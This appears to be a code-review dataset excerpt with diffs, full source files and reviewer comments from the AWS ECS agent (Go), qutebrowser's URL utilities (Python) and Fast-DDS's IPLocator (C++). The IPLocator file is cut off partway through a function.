reqHandler := func(message *ecsacs.AttachInstanceNetworkInterfacesMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.AttachInstanceNetworkInterfacesMessage{
MessageId: aws.String("123"),
ClusterArn: aws.String("default"),
ElasticNetworkInterfaces: []*ecsacs.ElasticNetworkInterface{
{AttachmentArn: aws.String("attach_arn"),
Ec2Id: aws.String("eni_id"),
Ipv4Addresses: []*ecsacs.IPv4AddressAssignment{
{
Primary: aws.Bool(true),
PrivateAddress: aws.String("ipv4"),
},
},
Ipv6Addresses: []*ecsacs.IPv6AddressAssignment{
{
Address: aws.String("ipv6"),
},
},
MacAddress: aws.String("mac"),
},
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
| 1 | 26,583 | for my understanding - are this line and the next line both necessary? they seem to contain duplicate information. same for the other test files | aws-amazon-ecs-agent | go |
@@ -102,6 +102,13 @@ def _get_search_url(txt):
engine = 'DEFAULT'
template = config.val.url.searchengines[engine]
url = qurl_from_user_input(template.format(urllib.parse.quote(term)))
+
+ if config.val.url.open_base_url and \
+ term in config.val.url.searchengines.keys():
+ url = qurl_from_user_input(config.val.url.searchengines[term])
+ url.setPath(None)
+ url.setFragment(None)
+ url.setQuery(None)
qtutils.ensure_valid(url)
return url
| 1 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Utils regarding URL handling."""
import re
import base64
import os.path
import ipaddress
import posixpath
import urllib.parse
from PyQt5.QtCore import QUrl, QUrlQuery
from PyQt5.QtNetwork import QHostInfo, QHostAddress, QNetworkProxy
from qutebrowser.config import config
from qutebrowser.utils import log, qtutils, message, utils
from qutebrowser.commands import cmdexc
from qutebrowser.browser.network import pac
# FIXME: we probably could raise some exceptions on invalid URLs
# https://github.com/qutebrowser/qutebrowser/issues/108
class InvalidUrlError(ValueError):
"""Error raised if a function got an invalid URL.
Inherits ValueError because that was the exception originally used for
that, so there still might be some code around which checks for that.
"""
def __init__(self, url):
if url.isValid():
raise ValueError("Got valid URL {}!".format(url.toDisplayString()))
self.url = url
self.msg = get_errstring(url)
super().__init__(self.msg)
def _parse_search_term(s):
"""Get a search engine name and search term from a string.
Args:
s: The string to get a search engine for.
Return:
A (engine, term) tuple, where engine is None for the default engine.
"""
s = s.strip()
split = s.split(maxsplit=1)
if len(split) == 2:
engine = split[0]
try:
config.val.url.searchengines[engine]
except KeyError:
engine = None
term = s
else:
term = split[1]
elif not split:
raise ValueError("Empty search term!")
else:
engine = None
term = s
log.url.debug("engine {}, term {!r}".format(engine, term))
return (engine, term)
def _get_search_url(txt):
"""Get a search engine URL for a text.
Args:
txt: Text to search for.
Return:
The search URL as a QUrl.
"""
log.url.debug("Finding search engine for {!r}".format(txt))
engine, term = _parse_search_term(txt)
assert term
if engine is None:
engine = 'DEFAULT'
template = config.val.url.searchengines[engine]
url = qurl_from_user_input(template.format(urllib.parse.quote(term)))
qtutils.ensure_valid(url)
return url
def _is_url_naive(urlstr):
"""Naive check if given URL is really a URL.
Args:
urlstr: The URL to check for, as string.
Return:
True if the URL really is a URL, False otherwise.
"""
url = qurl_from_user_input(urlstr)
assert url.isValid()
if not utils.raises(ValueError, ipaddress.ip_address, urlstr):
# Valid IPv4/IPv6 address
return True
# Qt treats things like "23.42" or "1337" or "0xDEAD" as valid URLs
# which we don't want to. Note we already filtered *real* valid IPs
# above.
if not QHostAddress(urlstr).isNull():
return False
host = url.host()
return '.' in host and not host.endswith('.')
def _is_url_dns(urlstr):
"""Check if a URL is really a URL via DNS.
Args:
url: The URL to check for as a string.
Return:
True if the URL really is a URL, False otherwise.
"""
url = qurl_from_user_input(urlstr)
assert url.isValid()
if (utils.raises(ValueError, ipaddress.ip_address, urlstr) and
not QHostAddress(urlstr).isNull()):
log.url.debug("Bogus IP URL -> False")
# Qt treats things like "23.42" or "1337" or "0xDEAD" as valid URLs
# which we don't want to.
return False
host = url.host()
if not host:
log.url.debug("URL has no host -> False")
return False
log.url.debug("Doing DNS request for {}".format(host))
info = QHostInfo.fromName(host)
return not info.error()
def fuzzy_url(urlstr, cwd=None, relative=False, do_search=True,
force_search=False):
"""Get a QUrl based on a user input which is URL or search term.
Args:
urlstr: URL to load as a string.
cwd: The current working directory, or None.
relative: Whether to resolve relative files.
do_search: Whether to perform a search on non-URLs.
force_search: Whether to force a search even if the content can be
interpreted as a URL or a path.
Return:
A target QUrl to a search page or the original URL.
"""
urlstr = urlstr.strip()
path = get_path_if_valid(urlstr, cwd=cwd, relative=relative,
check_exists=True)
if not force_search and path is not None:
url = QUrl.fromLocalFile(path)
elif force_search or (do_search and not is_url(urlstr)):
# probably a search term
log.url.debug("URL is a fuzzy search term")
try:
url = _get_search_url(urlstr)
except ValueError: # invalid search engine
url = qurl_from_user_input(urlstr)
else: # probably an address
log.url.debug("URL is a fuzzy address")
url = qurl_from_user_input(urlstr)
log.url.debug("Converting fuzzy term {!r} to URL -> {}".format(
urlstr, url.toDisplayString()))
if do_search and config.val.url.auto_search != 'never' and urlstr:
qtutils.ensure_valid(url)
else:
if not url.isValid():
raise InvalidUrlError(url)
return url
def _has_explicit_scheme(url):
"""Check if a url has an explicit scheme given.
Args:
url: The URL as QUrl.
"""
# Note that generic URI syntax actually would allow a second colon
# after the scheme delimiter. Since we don't know of any URIs
# using this and want to support e.g. searching for scoped C++
# symbols, we treat this as not a URI anyways.
return (url.isValid() and url.scheme() and
(url.host() or url.path()) and
' ' not in url.path() and
not url.path().startswith(':'))
def is_special_url(url):
"""Return True if url is an about:... or other special URL.
Args:
url: The URL as QUrl.
"""
if not url.isValid():
return False
special_schemes = ('about', 'qute', 'file')
return url.scheme() in special_schemes
def is_url(urlstr):
"""Check if url seems to be a valid URL.
Args:
urlstr: The URL as string.
Return:
True if it is a valid URL, False otherwise.
"""
autosearch = config.val.url.auto_search
log.url.debug("Checking if {!r} is a URL (autosearch={}).".format(
urlstr, autosearch))
urlstr = urlstr.strip()
qurl = QUrl(urlstr)
qurl_userinput = qurl_from_user_input(urlstr)
if autosearch == 'never':
# no autosearch, so everything is a URL unless it has an explicit
# search engine.
try:
engine, _term = _parse_search_term(urlstr)
except ValueError:
return False
else:
return engine is None
if not qurl_userinput.isValid():
# This will also catch URLs containing spaces.
return False
if _has_explicit_scheme(qurl):
# URLs with explicit schemes are always URLs
log.url.debug("Contains explicit scheme")
url = True
elif qurl_userinput.host() in ['localhost', '127.0.0.1', '::1']:
log.url.debug("Is localhost.")
url = True
elif is_special_url(qurl):
# Special URLs are always URLs, even with autosearch=never
log.url.debug("Is a special URL.")
url = True
elif autosearch == 'dns':
log.url.debug("Checking via DNS check")
# We want to use qurl_from_user_input here, as the user might enter
# "foo.de" and that should be treated as URL here.
url = _is_url_dns(urlstr)
elif autosearch == 'naive':
log.url.debug("Checking via naive check")
url = _is_url_naive(urlstr)
else: # pragma: no cover
raise ValueError("Invalid autosearch value")
log.url.debug("url = {}".format(url))
return url
def qurl_from_user_input(urlstr):
"""Get a QUrl based on a user input. Additionally handles IPv6 addresses.
QUrl.fromUserInput handles something like '::1' as a file URL instead of an
IPv6, so we first try to handle it as a valid IPv6, and if that fails we
use QUrl.fromUserInput.
WORKAROUND - https://bugreports.qt.io/browse/QTBUG-41089
FIXME - Maybe https://codereview.qt-project.org/#/c/93851/ has a better way
to solve this?
https://github.com/qutebrowser/qutebrowser/issues/109
Args:
urlstr: The URL as string.
Return:
The converted QUrl.
"""
# First we try very liberally to separate something like an IPv6 from the
# rest (e.g. path info or parameters)
match = re.fullmatch(r'\[?([0-9a-fA-F:.]+)\]?(.*)', urlstr.strip())
if match:
ipstr, rest = match.groups()
else:
ipstr = urlstr.strip()
rest = ''
# Then we try to parse it as an IPv6, and if we fail use
# QUrl.fromUserInput.
try:
ipaddress.IPv6Address(ipstr)
except ipaddress.AddressValueError:
return QUrl.fromUserInput(urlstr)
else:
return QUrl('http://[{}]{}'.format(ipstr, rest))
def invalid_url_error(url, action):
"""Display an error message for a URL.
Args:
action: The action which was interrupted by the error.
"""
if url.isValid():
raise ValueError("Calling invalid_url_error with valid URL {}".format(
url.toDisplayString()))
errstring = get_errstring(
url, "Trying to {} with invalid URL".format(action))
message.error(errstring)
def raise_cmdexc_if_invalid(url):
"""Check if the given QUrl is invalid, and if so, raise a CommandError."""
if not url.isValid():
raise cmdexc.CommandError(get_errstring(url))
def get_path_if_valid(pathstr, cwd=None, relative=False, check_exists=False):
"""Check if path is a valid path.
Args:
pathstr: The path as string.
cwd: The current working directory, or None.
relative: Whether to resolve relative files.
check_exists: Whether to check if the file
actually exists of filesystem.
Return:
The path if it is a valid path, None otherwise.
"""
pathstr = pathstr.strip()
log.url.debug("Checking if {!r} is a path".format(pathstr))
expanded = os.path.expanduser(pathstr)
if os.path.isabs(expanded):
path = expanded
elif relative and cwd:
path = os.path.join(cwd, expanded)
elif relative:
try:
path = os.path.abspath(expanded)
except OSError:
path = None
else:
path = None
if check_exists:
if path is not None:
try:
if os.path.exists(path):
log.url.debug("URL is a local file")
else:
path = None
except UnicodeEncodeError:
log.url.debug(
"URL contains characters which are not present in the "
"current locale")
path = None
return path
def filename_from_url(url):
"""Get a suitable filename from a URL.
Args:
url: The URL to parse, as a QUrl.
Return:
The suggested filename as a string, or None.
"""
if not url.isValid():
return None
pathname = posixpath.basename(url.path())
if pathname:
return pathname
elif url.host():
return url.host() + '.html'
else:
return None
def host_tuple(url):
"""Get a (scheme, host, port) tuple from a QUrl.
This is suitable to identify a connection, e.g. for SSL errors.
"""
if not url.isValid():
raise InvalidUrlError(url)
scheme, host, port = url.scheme(), url.host(), url.port()
assert scheme
if not host:
raise ValueError("Got URL {} without host.".format(
url.toDisplayString()))
if port == -1:
port_mapping = {
'http': 80,
'https': 443,
'ftp': 21,
}
try:
port = port_mapping[scheme]
except KeyError:
raise ValueError("Got URL {} with unknown port.".format(
url.toDisplayString()))
return scheme, host, port
def get_errstring(url, base="Invalid URL"):
"""Get an error string for a URL.
Args:
url: The URL as a QUrl.
base: The base error string.
Return:
A new string with url.errorString() is appended if available.
"""
url_error = url.errorString()
if url_error:
return base + " - {}".format(url_error)
else:
return base
def same_domain(url1, url2):
"""Check if url1 and url2 belong to the same website.
This will use a "public suffix list" to determine what a "top level domain"
is. All further domains are ignored.
For example example.com and www.example.com are considered the same. but
example.co.uk and test.co.uk are not.
Return:
True if the domains are the same, False otherwise.
"""
if not url1.isValid():
raise InvalidUrlError(url1)
if not url2.isValid():
raise InvalidUrlError(url2)
suffix1 = url1.topLevelDomain()
suffix2 = url2.topLevelDomain()
if suffix1 == '':
return url1.host() == url2.host()
if suffix1 != suffix2:
return False
domain1 = url1.host()[:-len(suffix1)].split('.')[-1]
domain2 = url2.host()[:-len(suffix2)].split('.')[-1]
return domain1 == domain2
def encoded_url(url):
"""Return the fully encoded url as string.
Args:
url: The url to encode as QUrl.
"""
return bytes(url.toEncoded()).decode('ascii')
class IncDecError(Exception):
"""Exception raised by incdec_number on problems.
Attributes:
msg: The error message.
url: The QUrl which caused the error.
"""
def __init__(self, msg, url):
super().__init__(msg)
self.url = url
self.msg = msg
def __str__(self):
return '{}: {}'.format(self.msg, self.url.toString())
def _get_incdec_value(match, incdec, url, count):
"""Get an incremented/decremented URL based on a URL match."""
pre, zeroes, number, post = match.groups()
# This should always succeed because we match \d+
val = int(number)
if incdec == 'decrement':
if val <= 0:
raise IncDecError("Can't decrement {}!".format(val), url)
val -= count
elif incdec == 'increment':
val += count
else:
raise ValueError("Invalid value {} for indec!".format(incdec))
if zeroes:
if len(number) < len(str(val)):
zeroes = zeroes[1:]
elif len(number) > len(str(val)):
zeroes += '0'
return ''.join([pre, zeroes, str(val), post])
def incdec_number(url, incdec, count=1, segments=None):
"""Find a number in the url and increment or decrement it.
Args:
url: The current url
incdec: Either 'increment' or 'decrement'
count: The number to increment or decrement by
segments: A set of URL segments to search. Valid segments are:
'host', 'port', 'path', 'query', 'anchor'.
Default: {'path', 'query'}
Return:
The new url with the number incremented/decremented.
Raises IncDecError if the url contains no number.
"""
if not url.isValid():
raise InvalidUrlError(url)
if segments is None:
segments = {'path', 'query'}
valid_segments = {'host', 'port', 'path', 'query', 'anchor'}
if segments - valid_segments:
extra_elements = segments - valid_segments
raise IncDecError("Invalid segments: {}".format(
', '.join(extra_elements)), url)
# Make a copy of the QUrl so we don't modify the original
url = QUrl(url)
# Order as they appear in a URL
segment_modifiers = [
('host', url.host, url.setHost),
('port', lambda: str(url.port()) if url.port() > 0 else '',
lambda x: url.setPort(int(x))),
('path', url.path, url.setPath),
('query', url.query, url.setQuery),
('anchor', url.fragment, url.setFragment),
]
# We're searching the last number so we walk the url segments backwards
for segment, getter, setter in reversed(segment_modifiers):
if segment not in segments:
continue
# Get the last number in a string
match = re.fullmatch(r'(.*\D|^)(0*)(\d+)(.*)', getter())
if not match:
continue
setter(_get_incdec_value(match, incdec, url, count))
return url
raise IncDecError("No number found in URL!", url)
def file_url(path):
"""Return a file:// url (as string) to the given local path.
Arguments:
path: The absolute path to the local file
"""
return QUrl.fromLocalFile(path).toString(QUrl.FullyEncoded)
def data_url(mimetype, data):
"""Get a data: QUrl for the given data."""
b64 = base64.b64encode(data).decode('ascii')
url = QUrl('data:{};base64,{}'.format(mimetype, b64))
qtutils.ensure_valid(url)
return url
def safe_display_string(qurl):
"""Get a IDN-homograph phishing safe form of the given QUrl.
If we're dealing with a Punycode-encoded URL, this prepends the hostname in
its encoded form, to make sure those URLs are distinguishable.
See https://github.com/qutebrowser/qutebrowser/issues/2547
and https://bugreports.qt.io/browse/QTBUG-60365
"""
if not qurl.isValid():
raise InvalidUrlError(qurl)
host = qurl.host(QUrl.FullyEncoded)
if '..' in host: # pragma: no cover
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-60364
return '(unparseable URL!) {}'.format(qurl.toDisplayString())
for part in host.split('.'):
if part.startswith('xn--') and host != qurl.host(QUrl.FullyDecoded):
return '({}) {}'.format(host, qurl.toDisplayString())
return qurl.toDisplayString()
def query_string(qurl):
"""Get a query string for the given URL.
This is a WORKAROUND for:
https://www.riverbankcomputing.com/pipermail/pyqt/2017-November/039702.html
"""
try:
return qurl.query()
except AttributeError: # pragma: no cover
return QUrlQuery(qurl).query()
class InvalidProxyTypeError(Exception):
"""Error raised when proxy_from_url gets an unknown proxy type."""
def __init__(self, typ):
super().__init__("Invalid proxy type {}!".format(typ))
def proxy_from_url(url):
"""Create a QNetworkProxy from QUrl and a proxy type.
Args:
url: URL of a proxy (possibly with credentials).
Return:
New QNetworkProxy.
"""
if not url.isValid():
raise InvalidUrlError(url)
scheme = url.scheme()
if scheme in ['pac+http', 'pac+https', 'pac+file']:
fetcher = pac.PACFetcher(url)
fetcher.fetch()
return fetcher
types = {
'http': QNetworkProxy.HttpProxy,
'socks': QNetworkProxy.Socks5Proxy,
'socks5': QNetworkProxy.Socks5Proxy,
'direct': QNetworkProxy.NoProxy,
}
if scheme not in types:
raise InvalidProxyTypeError(scheme)
proxy = QNetworkProxy(types[scheme], url.host())
if url.port() != -1:
proxy.setPort(url.port())
if url.userName():
proxy.setUser(url.userName())
if url.password():
proxy.setPassword(url.password())
return proxy
| 1 | 20,785 | No need for the `.keys()`, iterating over a dictionary gives you its keys (and thus you can also do `key in some_dict`). With that, it also fits on one line :wink: | qutebrowser-qutebrowser | py |
@@ -24,14 +24,6 @@ namespace eprosima {
namespace fastrtps {
namespace rtps {
-IPLocator::IPLocator()
-{
-}
-
-IPLocator::~IPLocator()
-{
-}
-
// Factory
void IPLocator::createLocator(
int32_t kindin, | 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @file IPLocator.cpp
*
*/
#include <fastrtps/utils/IPLocator.h>
#include <fastrtps/utils/IPFinder.h>
namespace eprosima {
namespace fastrtps {
namespace rtps {
IPLocator::IPLocator()
{
}
IPLocator::~IPLocator()
{
}
// Factory
void IPLocator::createLocator(
int32_t kindin,
const std::string& address,
uint32_t portin,
Locator_t& locator)
{
locator.kind = kindin;
locator.port = portin;
LOCATOR_ADDRESS_INVALID(locator.address);
switch (kindin)
{
case LOCATOR_KIND_TCPv4:
case LOCATOR_KIND_UDPv4:
{
setIPv4(locator, address);
break;
}
case LOCATOR_KIND_TCPv6:
case LOCATOR_KIND_UDPv6:
{
setIPv6(locator, address);
break;
}
}
}
// IPv4
bool IPLocator::setIPv4(
Locator_t& locator,
const unsigned char* addr)
{
memcpy(&locator.address[12], addr, 4 * sizeof(char));
return true;
}
bool IPLocator::setIPv4(
Locator_t& locator,
octet o1,
octet o2,
octet o3,
octet o4)
{
LOCATOR_ADDRESS_INVALID(locator.address);
locator.address[12] = o1;
locator.address[13] = o2;
locator.address[14] = o3;
locator.address[15] = o4;
return true;
}
bool IPLocator::setIPv4(
Locator_t& locator,
const std::string& ipv4)
{
//std::string _ipv4 = IPFinder::getIPv4Address(ipv4);
std::stringstream ss(ipv4);
int a, b, c, d; //to store the 4 ints
char ch; //to temporarily store the '.'
if (ss >> a >> ch >> b >> ch >> c >> ch >> d)
{
LOCATOR_ADDRESS_INVALID(locator.address);
locator.address[12] = (octet)a;
locator.address[13] = (octet)b;
locator.address[14] = (octet)c;
locator.address[15] = (octet)d;
return true;
}
return false;
}
bool IPLocator::setIPv4(
Locator_t& destlocator,
const Locator_t& origlocator)
{
return setIPv4(destlocator, getIPv4(origlocator));
}
const octet* IPLocator::getIPv4(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[12]);
}
bool IPLocator::hasIPv4(
const Locator_t& locator)
{
return locator.address[12] != 0 &&
locator.address[13] != 0 &&
locator.address[14] != 0 &&
locator.address[15] != 0;
}
std::string IPLocator::toIPv4string(
const Locator_t& locator)
{
std::stringstream ss;
ss << (int)locator.address[12] << "."
<< (int)locator.address[13] << "."
<< (int)locator.address[14] << "."
<< (int)locator.address[15];
return ss.str();
}
bool IPLocator::copyIPv4(
const Locator_t& locator,
unsigned char* dest)
{
memcpy(dest, &(locator.address[12]), 4 * sizeof(char));
return true;
}
// IPv6
bool IPLocator::setIPv6(
Locator_t& locator,
const unsigned char* addr)
{
memcpy(locator.address, addr, 16 * sizeof(char));
return true;
}
bool IPLocator::setIPv6(
Locator_t& locator,
uint16_t group0,
uint16_t group1,
uint16_t group2,
uint16_t group3,
uint16_t group4,
uint16_t group5,
uint16_t group6,
uint16_t group7)
{
locator.address[0] = (octet)(group0 >> 8);
locator.address[1] = (octet)group0;
locator.address[2] = (octet)(group1 >> 8);
locator.address[3] = (octet)group1;
locator.address[4] = (octet)(group2 >> 8);
locator.address[5] = (octet)group2;
locator.address[6] = (octet)(group3 >> 8);
locator.address[7] = (octet)group3;
locator.address[8] = (octet)(group4 >> 8);
locator.address[9] = (octet)group4;
locator.address[10] = (octet)(group5 >> 8);
locator.address[11] = (octet)group5;
locator.address[12] = (octet)(group6 >> 8);
locator.address[13] = (octet)group6;
locator.address[14] = (octet)(group7 >> 8);
locator.address[15] = (octet)group7;
return true;
}
bool IPLocator::setIPv6(
Locator_t& locator,
const std::string& ipv6)
{
//std::string _ipv6 = IPFinder::getIPv6Address(ipv6);
std::vector<std::string> hexdigits;
size_t start = 0, end = 0;
std::string auxstr;
while (end != std::string::npos)
{
end = ipv6.find(':', start);
if (end - start > 1)
{
hexdigits.push_back(ipv6.substr(start, end - start));
}
else
{
hexdigits.push_back(std::string("EMPTY"));
}
start = end + 1;
}
//FOUND a . in the last element (MAP TO IP4 address)
if ((hexdigits.end() - 1)->find('.') != std::string::npos)
{
return false;
}
*(hexdigits.end() - 1) = (hexdigits.end() - 1)->substr(0, (hexdigits.end() - 1)->find('%'));
int auxnumber = 0;
uint8_t index = 15;
for (auto it = hexdigits.rbegin(); it != hexdigits.rend(); ++it)
{
if (*it != std::string("EMPTY"))
{
if (it->length() <= 2)
{
locator.address[index - 1] = 0;
std::stringstream ss;
ss << std::hex << (*it);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
}
else
{
std::stringstream ss;
ss << std::hex << it->substr(it->length() - 2);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
ss.str("");
ss.clear();
ss << std::hex << it->substr(0, it->length() - 2);
ss >> auxnumber;
locator.address[index - 1] = (octet)auxnumber;
}
index -= 2;
}
else
{
break;
}
}
index = 0;
for (auto it = hexdigits.begin(); it != hexdigits.end(); ++it)
{
if (*it != std::string("EMPTY"))
{
if (it->length() <= 2)
{
locator.address[index] = 0;
std::stringstream ss;
ss << std::hex << (*it);
ss >> auxnumber;
locator.address[index + 1] = (octet)auxnumber;
}
else
{
std::stringstream ss;
ss << std::hex << it->substr(it->length() - 2);
ss >> auxnumber;
locator.address[index + 1] = (octet)auxnumber;
ss.str("");
ss.clear();
ss << std::hex << it->substr(0, it->length() - 2);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
}
index += 2;
}
else
{
break;
}
}
return true;
}
bool IPLocator::setIPv6(
Locator_t& destlocator,
const Locator_t& origlocator)
{
return setIPv6(destlocator, getIPv6(origlocator));
}
const octet* IPLocator::getIPv6(
const Locator_t& locator)
{
return locator.address;
}
bool IPLocator::hasIPv6(
const Locator_t& locator)
{
return locator.address[0] != 0 &&
locator.address[1] != 0 &&
locator.address[2] != 0 &&
locator.address[3] != 0 &&
locator.address[4] != 0 &&
locator.address[5] != 0 &&
locator.address[6] != 0 &&
locator.address[7] != 0 &&
locator.address[8] != 0 &&
locator.address[9] != 0 &&
locator.address[10] != 0 &&
locator.address[11] != 0 &&
locator.address[12] != 0 &&
locator.address[13] != 0 &&
locator.address[14] != 0 &&
locator.address[15] != 0;
}
std::string IPLocator::toIPv6string(
const Locator_t& locator)
{
std::stringstream ss;
ss << std::hex;
for (int i = 0; i != 14; i += 2)
{
auto field = (locator.address[i] << 8) + locator.address[i + 1];
ss << field << ":";
}
auto field = locator.address[14] + (locator.address[15] << 8);
ss << field;
return ss.str();
}
bool IPLocator::copyIPv6(
const Locator_t& locator,
unsigned char* dest)
{
memcpy(dest, locator.address, 16 * sizeof(char));
return true;
}
// Abstract from IPv4 and IPv6
bool IPLocator::ip(
Locator_t& locator,
const std::string& ip)
{
if (locator.kind == LOCATOR_KIND_TCPv4 ||
locator.kind == LOCATOR_KIND_UDPv4)
{
return setIPv4(locator, ip);
}
else if (locator.kind == LOCATOR_KIND_TCPv6 ||
locator.kind == LOCATOR_KIND_UDPv6)
{
return setIPv6(locator, ip);
}
return false;
}
std::string IPLocator::ip_to_string(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_TCPv4 ||
locator.kind == LOCATOR_KIND_UDPv4)
{
return toIPv4string(locator);
}
else if (locator.kind == LOCATOR_KIND_TCPv6 ||
locator.kind == LOCATOR_KIND_UDPv6)
{
return toIPv6string(locator);
}
return "";
}
// TCP
bool IPLocator::setLogicalPort(
Locator_t& locator,
uint16_t port)
{
uint16_t* loc_logical = reinterpret_cast<uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
loc_logical[0] = port; // Logical port is stored at 2nd and 3rd bytes of port
#else
loc_logical[1] = port; // Logical port is stored at 2nd and 3rd bytes of port
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
return port != 0;
}
uint16_t IPLocator::getLogicalPort(
const Locator_t& locator)
{
const uint16_t* loc_logical = reinterpret_cast<const uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
return loc_logical[0];
#else
return loc_logical[1];
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
}
bool IPLocator::setPhysicalPort(
Locator_t& locator,
uint16_t port)
{
uint16_t* loc_physical = reinterpret_cast<uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
loc_physical[1] = port; // Physical port is stored at 0 and 1st bytes of port
#else
loc_physical[0] = port; // Physical port is stored at 0 and 1st bytes of port
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
return port != 0;
}
uint16_t IPLocator::getPhysicalPort(
const Locator_t& locator)
{
const uint16_t* loc_physical = reinterpret_cast<const uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
return loc_physical[1];
#else
return loc_physical[0];
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
}
// TCPv4
bool IPLocator::setWan(
Locator_t& locator,
octet o1,
octet o2,
octet o3,
octet o4)
{
locator.address[8] = o1;
locator.address[9] = o2;
locator.address[10] = o3;
locator.address[11] = o4;
return true;
}
bool IPLocator::setWan(
Locator_t& locator,
const std::string& wan)
{
std::stringstream ss(wan);
int a, b, c, d; //to store the 4 ints
char ch; //to temporarily store the '.'
if ( ss >> a >> ch >> b >> ch >> c >> ch >> d)
{
locator.address[8] = (octet)a;
locator.address[9] = (octet)b;
locator.address[10] = (octet)c;
locator.address[11] = (octet)d;
}
return true;
}
const octet* IPLocator::getWan(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[8]);
}
bool IPLocator::hasWan(
const Locator_t& locator)
{
return locator.kind == LOCATOR_KIND_TCPv4 && // TCPv6 doesn't use WAN
(locator.address[8] != 0 ||
locator.address[9] != 0 ||
locator.address[10] != 0 ||
locator.address[11] != 0);
}
std::string IPLocator::toWanstring(
const Locator_t& locator)
{
std::stringstream ss;
ss << (int)locator.address[8] << "."
<< (int)locator.address[9] << "."
<< (int)locator.address[10] << "."
<< (int)locator.address[11];
return ss.str();
}
bool IPLocator::setLanID(
Locator_t& locator,
const std::string& lanId)
{
if (locator.kind == LOCATOR_KIND_TCPv4)
{
std::stringstream ss(lanId);
int a, b, c, d, e, f, g, h; //to store the 8 ints
char ch; //to temporarily store the '.'
if ( ss >> a >> ch >> b >> ch >> c >> ch >> d >> ch >> e >> ch >> f >> ch >> g >> ch >> h)
{
locator.address[0] = (octet)a;
locator.address[1] = (octet)b;
locator.address[2] = (octet)c;
locator.address[3] = (octet)d;
locator.address[4] = (octet)e;
locator.address[5] = (octet)f;
locator.address[6] = (octet)g;
locator.address[7] = (octet)h;
return true;
}
}
return false;
}
const octet* IPLocator::getLanID(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[0]);
}
std::string IPLocator::toLanIDstring(
const Locator_t& locator)
{
if (locator.kind != LOCATOR_KIND_TCPv4)
{
return "";
}
std::stringstream ss;
ss << (int)locator.address[0] << "."
<< (int)locator.address[1] << "."
<< (int)locator.address[2] << "."
<< (int)locator.address[3] << "."
<< (int)locator.address[4] << "."
<< (int)locator.address[5] << "."
<< (int)locator.address[6] << "."
<< (int)locator.address[7];
return ss.str();
}
Locator_t IPLocator::toPhysicalLocator(
const Locator_t& locator)
{
Locator_t result = locator;
setLogicalPort(result, 0);
return result;
}
bool IPLocator::ip_equals_wan(
const Locator_t& locator)
{
return hasWan(locator) &&
locator.address[8] == locator.address[12] &&
locator.address[9] == locator.address[13] &&
locator.address[10] == locator.address[14] &&
locator.address[11] == locator.address[15];
}
// Common
bool IPLocator::setPortRTPS(
Locator_t& locator,
uint16_t port)
{
if (locator.kind == LOCATOR_KIND_UDPv4 || locator.kind == LOCATOR_KIND_UDPv6)
{
return setPhysicalPort(locator, port);
}
else if (locator.kind == LOCATOR_KIND_TCPv4 || locator.kind == LOCATOR_KIND_TCPv6)
{
return setLogicalPort(locator, port);
}
return false;
}
uint16_t IPLocator::getPortRTPS(
Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4 || locator.kind == LOCATOR_KIND_UDPv6)
{
return getPhysicalPort(locator);
}
else if (locator.kind == LOCATOR_KIND_TCPv4 || locator.kind == LOCATOR_KIND_TCPv6)
{
return getLogicalPort(locator);
}
return false;
}
bool IPLocator::isLocal(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4
|| locator.kind == LOCATOR_KIND_TCPv4)
{
return locator.address[12] == 127
&& locator.address[13] == 0
&& locator.address[14] == 0
&& locator.address[15] == 1;
}
else
{
return locator.address[0] == 0
&& locator.address[1] == 0
&& locator.address[2] == 0
&& locator.address[3] == 0
&& locator.address[4] == 0
&& locator.address[5] == 0
&& locator.address[6] == 0
&& locator.address[7] == 0
&& locator.address[8] == 0
&& locator.address[9] == 0
&& locator.address[10] == 0
&& locator.address[11] == 0
&& locator.address[12] == 0
&& locator.address[13] == 0
&& locator.address[14] == 0
&& locator.address[15] == 1;
}
}
bool IPLocator::isAny(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4
|| locator.kind == LOCATOR_KIND_TCPv4)
{
return locator.address[12] == 0 &&
locator.address[13] == 0 &&
locator.address[14] == 0 &&
locator.address[15] == 0;
}
else
{
return locator.address[0] == 0 &&
locator.address[1] == 0 &&
locator.address[2] == 0 &&
locator.address[3] == 0 &&
locator.address[4] == 0 &&
locator.address[5] == 0 &&
